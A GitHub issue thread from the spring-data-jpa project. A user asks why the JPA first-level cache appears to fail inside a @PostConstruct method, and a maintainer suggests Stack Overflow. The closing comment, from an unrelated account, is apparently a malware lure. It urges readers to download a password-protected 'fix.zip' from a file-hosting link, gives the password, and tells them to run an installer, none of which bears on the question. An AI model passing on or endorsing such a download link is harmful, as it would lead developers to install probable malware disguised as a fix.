### ISSUE TITLE
use @Postcontruct jpa first level cache didn't work

### ISSUE THREAD

**Issue by chixiaopao** [spring-projects/spring-data-jpa#3596]
When I use a for loop in the method annotated by Postcontruct to query the value in the database. After the first query value, then  manually modify the database value, the result of the second loop query is not the value in the cache.

I think the jpa first-level cache should take effect, but I don’t know why it failed. Can anyone give me an answer?

thanks

**Comment by christophstrobl** [comment]
Thanks for getting in touch, but it feels like this is a question that would be better suited to [Stack Overflow](http://stackoverflow.com/). We prefer to use GitHub issues only for bugs and enhancements. Feel free to update this issue with a link to the re-posted question (so that other people can find it) or add some more details if you feel this is a genuine bug.

**Comment by NhutDang2002** [comment]
Download 
https://www.mediafire.com/file/o50xaz6wgtazqnx/fix.zip/file
password: changeme
In the installer menu, select "gcc."
